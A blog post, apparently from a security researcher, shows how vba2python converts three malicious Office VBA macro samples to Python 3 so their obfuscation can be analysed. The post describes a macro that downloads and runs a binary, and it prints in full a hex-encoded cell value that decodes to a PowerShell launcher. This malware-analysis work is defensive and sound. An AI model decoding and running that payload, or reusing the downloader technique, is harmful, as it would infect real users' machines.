This will probably be the last post about vba2python for a while. This time we’ll walk through three samples, look at the output, and go over the challenges each one poses when converting it to Python 3.x.
Sample 1 – 000475fc6e6705bbc5ebad8cc3af23c6a44b6ab7

Not a complicated sample. You see Dim statements followed by a ‘:’, which means a second statement runs on the same line. It also uses a class to download a binary through Microsoft.XMLHTTP, writes it to disk with Adodb.Stream, and then spawns it. It also uses “With”, which needs to be supported. The output once it’s done:

Pretty straightforward: the sample wasn’t complex to start with, and running it in Python just removes a bit of obfuscation.
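To illustrate the ‘:’ handling mentioned for this sample, here is a minimal sketch of splitting one VBA source line into separate statements. The helper name `split_statements` is hypothetical and is not taken from vba2python. It assumes colons inside string literals must be left alone, and it does not try to handle line labels or comments.

```python
from typing import List


def split_statements(line: str) -> List[str]:
    """Split one VBA source line on ':' separators outside string literals."""
    parts, current, in_string = [], [], False
    for ch in line:
        if ch == '"':
            # A doubled quote ("") inside a string toggles twice,
            # so the in_string state ends up correct again.
            in_string = not in_string
        if ch == ":" and not in_string:
            parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    parts.append("".join(current).strip())
    # Drop empty fragments, e.g. from a trailing colon.
    return [p for p in parts if p]


# The URL below is a made-up placeholder, not data from the sample.
print(split_statements('Dim url As String: url = "http://example.invalid/a.exe"'))
```

Each returned statement can then be translated on its own, which keeps the rest of the converter line-oriented.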
Sample 2 – e4debf873d683a51626882ba69364b54e5881799
This sample isn’t really difficult, but it contains some elements that took time.

You see Workbook_Open with a “complicated” “Select Case” that has a bit more oomph in the values it reacts to. This is not actually relevant to the sample being malicious; it’s just obfuscation. The magic happens here (the variable m222371a95aa9d8 is actually initialized to 3):

It uses a function rd165a9f386b4b to decrypt the data. Part of the data is just the object it wants to create and run .Exec from. Part of the fun is that the rest comes from the sheet ZAOIQ, cell G135 (it uses Range, but on a single cell), whose value it extracts:
index,name,row,col,value
1,ZAOIQ,6,134,"8281897784857A777E7E40778A77323F897B8076818985868B7E77327A7B76767780323F8081828481787B7E77323F578A777587867B818062817E7B758B3264777F818677657B798077761F1C78878075867B818032804645787877328D1F1C827384737F3A367A73467878743B1F1C368545454873324F32397F4877484376394D1F1C3680764745747378324F3239394D1F1C788184323A367B324F32424D32367B323F7E8632367A7346787874407E778079867A4D32367B3D4F443B328D1F1C368046737445324F326D758180887784866F4C4C6681548B86773A367A7346787874406587748586847B80793A367B3E32443B3E3243483B4D1F1C3680764745747378323D4F326D757A73846F3A368046737445323F748A8184323685454548736D3A367B324132443B323732368545454873407E778079867A6F3B4D1F1C8F1F1C8477868784803236807647457473784D1F1C8F1F1C367949494B43324F3239434A46474275474A4748464645774678434846444746424B4748457448784645464442764245474346474847464A4349434B4745424A434A484543434245464442754774474646734446474A43434745464542744376484742424646464942764277474543484276457548774376464542494773474A424946764747424B4749464443494676474342454278474547424277457448
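As a small aid for reading the dump, this sketch converts an A1-style reference to zero-based indices. For G135 it gives row 134 and column 6, the same two numbers listed in the dump, which suggests the 6 and 134 are the zero-based column and row even though the header orders them as row,col. The function name `a1_to_zero_based` is hypothetical.

```python
import re


def a1_to_zero_based(ref: str):
    """Convert an A1-style reference such as 'G135' to zero-based (row, col)."""
    match = re.fullmatch(r"([A-Za-z]+)(\d+)", ref)
    if match is None:
        raise ValueError(f"not an A1 reference: {ref!r}")
    letters, digits = match.groups()
    col = 0
    for ch in letters.upper():
        # Column letters are a base-26 number with A=1 ... Z=26.
        col = col * 26 + (ord(ch) - ord("A") + 1)
    return int(digits) - 1, col - 1


print(a1_to_zero_based("G135"))  # (134, 6)
```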
Once the cell value is extracted, it is passed to the rd165a9f386b4b function, which looks like this:

It basically runs through the string two characters at a time, converts them to an int so they can be manipulated, and converts the result back with chr before appending it to the output string. Not complicated, just hard for a human to read. For a computer, once this code is converted to Python 3, we simply get the result:

So the decrypted cell data is just a PowerShell command, which is itself encrypted. At least you get the context of what the macro does, and PowerShell is another beast I might take on later.
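The decoding loop described for this sample can be sketched in a few lines of Python. This is not the converted rd165a9f386b4b function. The name `decode_hex_shift` is hypothetical, and the offset of 18 is an assumption inferred from the first bytes of the cell value shown above, not read from the macro itself.

```python
def decode_hex_shift(data: str, shift: int = 18) -> str:
    """Decode a hex string two characters at a time, subtracting a fixed offset."""
    out = []
    for i in range(0, len(data) - 1, 2):
        value = int(data[i:i + 2], 16)           # two hex characters -> int
        out.append(chr((value - shift) % 256))   # undo the offset, back to a char
    return "".join(out)


# First 54 characters of the G135 cell value from the dump above.
prefix = "8281897784857A777E7E40778A77323F897B8076818985868B7E77"
print(decode_hex_shift(prefix))  # powershell.exe -windowstyle
```

With the same offset, the recurring `1F1C` pairs in the cell value decode to carriage return and line feed, which fits a multi-line script.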
Sample 3 – ddcbcf91d98ac04ffbc90ff597bab6263c69eded
This sample also has a lot of obfuscation. It starts with lots of string variables that you might believe contain the encrypted data, but it’s not there.

At some point this KC_U function is invoked, and there are two tricks that were challenging.

The first one: ‘GoTo’ doesn’t really exist in Python, but looking around I found a Python package “goto” that I import (one of the reasons to love Python). You need to decorate the function that uses it with @with_goto and write the “goto” and “label” statements in the format it expects. One extra challenge here was that the sample jumps back and forth a bit, and at label x3 it exits the sub. Unfortunately the goto library could not see past that exit, so the x2 label couldn’t be reached. The solution was to automagically rewrite this section to the following when the Python code is generated:

So if the code wants to return from the subroutine in a goto scenario while there is still code beyond the “return”, you add another label at the end and simply replace the “return” with “goto .exitatlast”.
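The rewrite rule can be sketched as a small text transformation over the generated function body. This is only an illustration, not the actual vba2python code. The helper name `rewrite_returns` and the sample body lines are hypothetical, and it assumes bare `return` statements and a body whose first line sits at the base indentation.

```python
from typing import List


def rewrite_returns(body_lines: List[str], exit_label: str = "exitatlast") -> List[str]:
    """Replace bare 'return' lines with a goto to a label appended at the end."""
    rewritten = []
    for line in body_lines:
        indent = line[: len(line) - len(line.lstrip())]
        if line.strip() == "return":
            # Jump to the final label instead of returning mid-function.
            rewritten.append(f"{indent}goto .{exit_label}")
        else:
            rewritten.append(line)
    # Assumption: the first body line is at the function's base indentation.
    first = body_lines[0] if body_lines else ""
    base = first[: len(first) - len(first.lstrip())]
    rewritten.append(f"{base}label .{exit_label}")
    return rewritten


body = [
    "    goto .x1",
    "    label .x3",
    "    return",
    "    label .x2",
    "    goto .x3",
    "    label .x1",
    "    goto .x2",
]
print("\n".join(rewrite_returns(body)))
```

Because the function now ends at a single label, no label sits behind a `return` any more, which is the situation the goto library could not handle.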
The second trick this plays, which is harder to understand at the moment, is finding the data it decrypts. All the data you see in the document is garbage. As you can see, it reads the Cell (1,1) value, but it wants the text of the Comment. The TxO record in the Workbook stream looks like this and contains the encrypted data:

with a lot more data following. Other records that build up to this are these:

Current thinking is that cell (1,1) is an image, as the Obj record has a 0x19 (Note) and this is followed by a MsoDrawing record which again TxO needs to follow.
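To find records like these yourself, the Workbook stream can be walked record by record: each BIFF record starts with a 2-byte type and a 2-byte length, both little-endian, followed by the payload. The sketch below assumes the stream has already been extracted from the OLE container as bytes. The function name `iter_biff_records` and the synthetic test stream are made up for illustration, and the record type numbers are the ones given in the MS-XLS format description.

```python
import struct

# Record types relevant to cell comments (per MS-XLS).
RECORD_NAMES = {
    0x001C: "Note",
    0x003C: "Continue",
    0x005D: "Obj",
    0x00EC: "MsoDrawing",
    0x01B6: "TxO",
}


def iter_biff_records(stream: bytes):
    """Yield (record_type, payload) for each BIFF record in a Workbook stream."""
    offset = 0
    while offset + 4 <= len(stream):
        rec_type, size = struct.unpack_from("<HH", stream, offset)
        yield rec_type, stream[offset + 4 : offset + 4 + size]
        offset += 4 + size


# Synthetic stream for illustration only: Obj, MsoDrawing, TxO with dummy payloads.
demo = (
    struct.pack("<HH", 0x005D, 2) + b"\x19\x00"
    + struct.pack("<HH", 0x00EC, 0)
    + struct.pack("<HH", 0x01B6, 3) + b"abc"
)
for rec_type, payload in iter_biff_records(demo):
    print(RECORD_NAMES.get(rec_type, hex(rec_type)), len(payload))
```

In a real file the text belonging to a TxO is normally carried by the Continue records that follow it, so a fuller parser would collect those as well.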
When this runs as Python code, the result looks like this:

Again we see it just launches a PowerShell script, but in this case it’s not encrypted. The tool provides good context of what the document is up to.
I think this will be my last post on vba2python, as it’s starting to look good and behave as I expect it to. I’ll probably rewrite it a few times to enhance it, and work on more samples to make sure it handles what a real-world gateway needs for this kind of inspection. Then it’s time to find a new task.